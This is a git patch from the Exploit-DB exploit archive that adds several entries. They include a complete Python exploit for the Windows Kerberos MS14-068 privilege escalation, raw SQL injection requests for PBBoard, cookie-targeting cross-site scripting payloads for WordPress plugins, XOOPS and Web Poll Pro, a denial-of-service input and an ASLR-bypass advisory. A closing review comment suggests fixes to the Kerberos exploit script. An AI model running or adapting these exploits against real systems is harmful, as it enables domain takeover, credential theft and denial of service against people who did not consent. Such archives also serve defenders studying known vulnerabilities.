From 3672d19ffa56928d57ff2f05bb82535cb4feac00 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 7 Dec 2014 04:53:52 +0000 Subject: [PATCH] Updated 12_07_2014 --- files.csv | 8 ++ platforms/lin_amd64/local/35472.txt | 77 ++++++++++++ platforms/linux/dos/35478.txt | 9 ++ platforms/php/webapps/35473.txt | 158 +++++++++++++++++++++++ platforms/php/webapps/35475.txt | 12 ++ platforms/php/webapps/35476.txt | 11 ++ platforms/php/webapps/35477.txt | 78 ++++++++++++ platforms/php/webapps/35479.txt | 15 +++ platforms/windows/remote/35474.py | 189 ++++++++++++++++++++++++++++ 9 files changed, 557 insertions(+) create mode 100755 platforms/lin_amd64/local/35472.txt create mode 100755 platforms/linux/dos/35478.txt create mode 100755 platforms/php/webapps/35473.txt create mode 100755 platforms/php/webapps/35475.txt create mode 100755 platforms/php/webapps/35476.txt create mode 100755 platforms/php/webapps/35477.txt create mode 100755 platforms/php/webapps/35479.txt create mode 100755 platforms/windows/remote/35474.py diff --git a/files.csv b/files.csv index 04c597eae..1014d9ffd 100755 --- a/files.csv +++ b/files.csv 
@@ -31946,3 +31946,11 @@ id,file,description,date,author,platform,type,port
 35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0
 35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0
 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0
+35472,platforms/lin_amd64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64bit Linux",2014-12-05,"Packet Storm",lin_amd64,local,0
+35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80
+35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0
+35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0
+35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0
+35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0
+35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0
+35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0
diff --git a/platforms/lin_amd64/local/35472.txt b/platforms/lin_amd64/local/35472.txt
new file mode 100755
index 000000000..25355bbe7
--- /dev/null
+++ b/platforms/lin_amd64/local/35472.txt
@@ -0,0 +1,77 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + ++------------------------------------------------------------------------------+ +| Packet Storm Advisory 2014-1204-1 | +| http://packetstormsecurity.com/ | ++------------------------------------------------------------------------------+ +| Title: Offset2lib: Bypassing Full ASLR On 64bit Linux | ++--------------------+---------------------------------------------------------+ +| Release Date | 2014/12/04 | +| Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) | +| Researchers | Hector Marco and Ismael Ripoll | ++--------------------+---------------------------------------------------------+ +| System Affected | 64 bit PIE Linux | +| Classification | 1-day | ++--------------------+---------------------------------------------------------+ + ++----------+ +| OVERVIEW | ++----------+ + +The release of this advisory provides exploitation details in relation +a weakness in the Linux ASLR implementation. The problem appears when +the executable is PIE compiled and it has an address leak belonging to +the executable. + +These details were obtained through the Packet Storm Bug Bounty program +and are being released to the community. + ++------------------------------------------------------------------------------+ + ++---------+ +| DETAILS | ++---------+ + +An attacker is able to de-randomize all mmapped areas (libraries, mapped files, etc.) +by knowing only an address belonging to the application and the offset2lib value. 
+ ++------------------------------------------------------------------------------+ + ++------------------+ +| PROOF OF CONCEPT | ++------------------+ + +The proof of concept exploit code is available here: +http://www.exploit-db.com/sploits/35472.tgz +http://packetstormsecurity.com/files/129398 + ++------------------------------------------------------------------------------+ + ++---------------+ +| RELATED LINKS | ++---------------+ + +http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html + ++------------------------------------------------------------------------------+ + + ++----------------+ +| SHAMELESS PLUG | ++----------------+ + +The Packet Storm Bug Bounty program gives researchers the ability to profit +from their discoveries. You can get paid thousands of dollars for one day +and zero day exploits. Get involved by contacting us at +getpaid@packetstormsecurity.com or visit the bug bounty page at: + +http://packetstormsecurity.com/bugbounty/ + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.11 (GNU/Linux) + +iEYEARECAAYFAlSBA04ACgkQrM7A8W0gTbG0jwCdH5CHOIDO9ELRcrPhQmf5FF4z +TgQAn2zuwadnWdMueC8gUQPT5gCmrQyp +=iegV +-----END PGP SIGNATURE----- diff --git a/platforms/linux/dos/35478.txt b/platforms/linux/dos/35478.txt new file mode 100755 index 000000000..c24369988 --- /dev/null +++ b/platforms/linux/dos/35478.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46923/info + +MHonArc is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to consume all CPU resources, denying service to legitimate users. + +MHonArc versions 2.6.16 and prior are vulnerable. + +dy>dy>dy>dy> \ No newline at end of file diff --git a/platforms/php/webapps/35473.txt b/platforms/php/webapps/35473.txt new file mode 100755 index 000000000..04bdab5bc --- /dev/null +++ b/platforms/php/webapps/35473.txt 
@@ -0,0 +1,158 @@ +Vulnerability title: SQL Injection in PBBoard CMS +CVE: CVE-2014-9215 +CMS: PBBoard +Vendor: Power bulletin board - http://www.pbboard.info/ +Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download +Affected version: Version 3.0.1 (updated on 13/09/2014) and before. +Fixed version: Version 3.0.1 (updated on 28/11/2014) +Google dork: intext:Powered By PBBoard +Reported by: Tran Dinh Tien - tien.d.tran@itas.vn +Credits to ITAS Team - www.itas.vn + + +:: DESCRITION :: + +Multiple SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection. + +:: DETAILS :: Attack vector + +Link 1: + +POST /index.php?page=register&checkemail=1 HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://server/index.php?page=register&index=1&agree=1 +Content-Length: 29 +Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +email=&ajax=1 + + +Link 2: + +POST /index.php?page=forget&start=1 HTTP/1.1 +Host: target.org +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://server/index.php?page=forget&index=1 +Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded 
+Content-Length: 52 + +code=0ae4e&email=&submit_forget=Save + + +link 3: + +POST /index.php?page=forget&send_active_code=1 HTTP/1.1 +Host: target.org +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://server/index.php?page=forget&active_member=1&send_active_code=1 +Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 + +code=13709&email=&submit_active_code=Save + + +:: CODE DETAIL :: + +- Vulnerable parameter: email +- Vulnerable file: includes/functions.class.php +- Vulnerable function: CheckEmail($email) + +- Vulnerable code: + function CheckEmail($email) + { + return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false; + } + +- Fix code: + function CheckEmail($email) + { + // First, we check that there's one @ symbol, and that the lengths are right + if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) { + // Email invalid because wrong number of characters in one section, or wrong number of @ symbols. 
+ return false; + } + + if (@strstr($email,'"') + or @strstr($email,"'") + or @strstr($email,'>') + or @strstr($email,'<') + or @strstr($email,'*') + or @strstr($email,'%') + or @strstr($email,'$') + or @strstr($email,'#') + or @strstr($email,'+') + or @strstr($email,'^') + or @strstr($email,'&') + or @strstr($email,',') + or @strstr($email,'~') + or @strstr($email,'!') + or @strstr($email,'{') + or @strstr($email,'}') + or @strstr($email,'(') + or @strstr($email,')') + or @strstr($email,'/')) + { + return false; + } + // Split it into sections to make life easier + $email_array = explode("@", $email); + $local_array = explode(".", $email_array[0]); + for ($i = 0; $i < sizeof($local_array); $i++) { + if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) { + return false; + } + } + if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) { // Check if domain is IP. If not, it should be valid domain name + $domain_array = explode(".", $email_array[1]); + if (sizeof($domain_array) < 2) { + return false; // Not enough parts to domain + } + for ($i = 0; $i < sizeof($domain_array); $i++) { + if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) { + return false; + } + } + } + + return true; + } + + + +:: SOLUTION :: +Version 3.0.1 (updated on 28/11/2014) + +:: DISCLOSURE :: +- 11/27/2014: Inform the vendor +- 11/28/2014: Vendor confirmed +- 11/28/2014: Vendor releases patch +- 12/01/2014: ITAS Team publishes information + +::COPYRIGHT:: +Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn). + +:: DISCLAIMER :: +THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? 
WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. + +:: REFERENCE :: +- http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html +- https://www.youtube.com/watch?v=AQiGvH5xrJg \ No newline at end of file diff --git a/platforms/php/webapps/35475.txt b/platforms/php/webapps/35475.txt new file mode 100755 index 000000000..462ec9274 --- /dev/null +++ b/platforms/php/webapps/35475.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/46902/info + +Sodahead Polls is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Sodahead Polls 2.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/sodahead-polls/poll.php?customize=%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E + + +http://www.example.com/wp-content/plugins/sodahead-polls/customizer.php?poll_id=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35476.txt b/platforms/php/webapps/35476.txt new file mode 100755 index 000000000..b3166d4e7 --- /dev/null +++ b/platforms/php/webapps/35476.txt 
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/46904/info + +Rating-Widget is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Rating-Widget 1.3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/rating-widget/view/rating.php?vars[type]=[xss] +http://www.example.com/plugins/rating-widget/view/availability_options.php?selected_key=[xss] +http://www.example.com/wp-content/plugins/rating-widget/view/save.php?rw_form_hidden_field_name=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35477.txt b/platforms/php/webapps/35477.txt new file mode 100755 index 000000000..f563ec6b1 --- /dev/null +++ b/platforms/php/webapps/35477.txt 
@@ -0,0 +1,78 @@ +source: http://www.securityfocus.com/bid/46916/info + +XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +XOOPS 2.5.0 is vulnerable; other versions may also be affected. + +Parameter: module + +http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe + + +Parameter: module[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +op=confirm&module%5b%5d=1">&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System +[/REQUEST] + + +Parameter: memberslist_id[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=users&selgroups=2 +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 94 + +memberslist_id%5b%5d=">&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group +[/REQUEST] + + +Parameter: newname[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: 
application/x-www-form-urlencoded +Content-Length: 100 + +op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System"> +[/REQUEST] + + +Parameter: oldname[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System">1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System +[/REQUEST] + + + diff --git a/platforms/php/webapps/35479.txt b/platforms/php/webapps/35479.txt new file mode 100755 index 000000000..07faa59c6 --- /dev/null +++ b/platforms/php/webapps/35479.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/46932/info + +Web Poll Pro is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. + +Web Poll Pro 1.0.3 is vulnerable; other versions may also be affected. + +
+ +'> +
+ \ No newline at end of file diff --git a/platforms/windows/remote/35474.py b/platforms/windows/remote/35474.py new file mode 100755 index 000000000..a23e6b040 --- /dev/null +++ b/platforms/windows/remote/35474.py 
@@ -0,0 +1,189 @@
+#!/usr/bin/python
+
+# MS14-068 Exploit
+
+# Author
+# ------
+# Sylvain Monne
+# Contact : sylvain dot monne at solucom dot fr
+# http://twitter.com/bidord
+
+
+
+import sys, os
+from random import getrandbits
+from time import time, localtime, strftime
+
+from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
+from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5
+from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \
+ decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \
+ AD_WIN2K_PAC
+from kek.pac import build_pac, pretty_print_pac
+from kek.util import epoch2gt, gt2epoch
+
+
+def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host,
+ output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):
+
+ sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
+ sys.stderr.flush()
+ nonce = getrandbits(31)
+ current_time = time()
+ as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
+ sys.stderr.flush()
+ sock = send_req(as_req, kdc_a)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
+ sys.stderr.flush()
+ data = recv_rep(sock)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
+ sys.stderr.flush()
+ as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
+ session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
+ logon_time = gt2epoch(str(as_rep_enc['authtime']))
+ tgt_a = as_rep['ticket']
+ sys.stderr.write(' Done!\n')
+
+
+ if krbtgt_a_key is not None:
+ print >> sys.sdterr, as_rep.prettyPrint()
+ print >> sys.stderr, as_rep_enc.prettyPrint()
+ ticket_debug(tgt_a, krbtgt_a_key)
+
+ sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
+ sys.stderr.flush()
+ subkey = generate_subkey()
+ nonce = getrandbits(31)
+ current_time = time()
+ pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
+ tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name,
+ tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
+ sys.stderr.flush()
+ sock = send_req(tgs_req, kdc_a)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
+ sys.stderr.flush()
+ data = recv_rep(sock)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
+ tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
+ session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
+ tgt_b = tgs_rep['ticket']
+ sys.stderr.write(' Done!\n')
+
+
+ if trust_ab_key is not None:
+ pretty_print_pac(pac[1])
+ print >> sys.stderr, tgs_rep.prettyPrint()
+ print >> sys.stderr, tgs_rep_enc.prettyPrint()
+ ticket_debug(tgt_b, trust_ab_key)
+
+
+ if target_service is not None and target_host is not None and kdc_b is not None:
+ sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
+ sys.stderr.flush()
+ subkey = generate_subkey()
+ nonce = getrandbits(31)
+ current_time = time()
+ tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
+ tgt_b, session_key2, subkey, nonce, current_time)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
+ sys.stderr.flush()
+ sock = send_req(tgs_req2, kdc_b)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
+ sys.stderr.flush()
+ data = recv_rep(sock)
+ sys.stderr.write(' Done!\n')
+
+ sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
+ tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
+ sys.stderr.write(' Done!\n')
+
+ else:
+ tgs_rep2 = tgs_rep
+ tgs_rep_enc2 = tgs_rep_enc
+
+ sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
+ cc = CCache((user_realm, user_name))
+ tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
+ cc.add_credential(tgs_cred)
+ cc.save(output_filename)
+ sys.stderr.write(' Done!\n')
+
+
+ if target_key is not None:
+ print >> sys.stderr, tgs_rep2.prettyPrint()
+ print >> sys.stderr, tgs_rep_enc2.prettyPrint()
+ ticket_debug(tgs_rep2['ticket'], target_key)
+
+
+# Pretty print full ticket content
+# Only possible in a lab environment when you already know krbtgt and/or service keys
+def ticket_debug(ticket, key):
+ try:
+ ticket_enc = decrypt_ticket_enc_part(ticket, key)
+ print >> sys.stderr, ticket.prettyPrint()
+ for ad in iter_authorization_data(ticket_enc['authorization-data']):
+ print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type']
+ if ad['ad-type'] == AD_WIN2K_PAC:
+ pretty_print_pac(str(ad['ad-data']))
+ else:
+ print >> sys.stderr, str(ad['ad-data']).encode('hex')
+ except Exception as e:
+ print 'ERROR:', e
+
+
+if __name__ == '__main__':
+ from getopt import getopt
+ from getpass import getpass
+
+ def usage_and_exit():
+ print >> sys.stderr, 'USAGE:'
+ print >> sys.stderr, '%s -u @ -s -d ' % sys.argv[0]
+ print >> sys.stderr, ''
+ print >> sys.stderr, 'OPTIONS:'
+ print >> sys.stderr, ' -p '
+ print >> sys.stderr, ' --rc4 '
+ sys.exit(1)
+
+ opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
+ opts = dict(opts)
+ if not all(k in opts for k in ('-u', '-s', '-d')):
+ usage_and_exit()
+
+ user_name, user_realm = opts['-u'].split('@', 1)
+ user_sid = opts['-s']
+ kdc_a = opts['-d']
+
+ if '--rc4' in opts:
+ user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
+ assert len(user_key[1]) == 16
+ elif '-p' in opts:
+ user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
+ else:
+ user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest())
+
+ target_realm = user_realm
+ target_service = target_host = kdc_b = None
+ filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)
+
+ user_realm = user_realm.upper()
+ target_realm = target_realm.upper()
+
+ sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
\ No newline at end of file
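Review bot: `print >> sys.sdterr, as_rep.prettyPrint()` in the `krbtgt_a_key is not None` branch of `sploit` misspells `stderr`, so that lab-only debug branch raises AttributeError before printing anything; it should read `print >> sys.stderr, as_rep.prettyPrint()`. In the `__main__` block, `assert len(user_key[1]) == 16` is the only validation of the `--rc4` value, and assert statements are stripped under `python -O`; `if len(user_key[1]) != 16: usage_and_exit()` keeps the check in every run. `ticket_debug` reports its own failure with `print 'ERROR:', e` on stdout while every other status message in the file goes to stderr; `print >> sys.stderr, 'ERROR:', e` keeps the streams consistent. The imports `os`, `localtime`, `strftime`, `get_tgt_cred`, `HMAC_MD5` and `epoch2gt` are never referenced in the hunk and could be dropped.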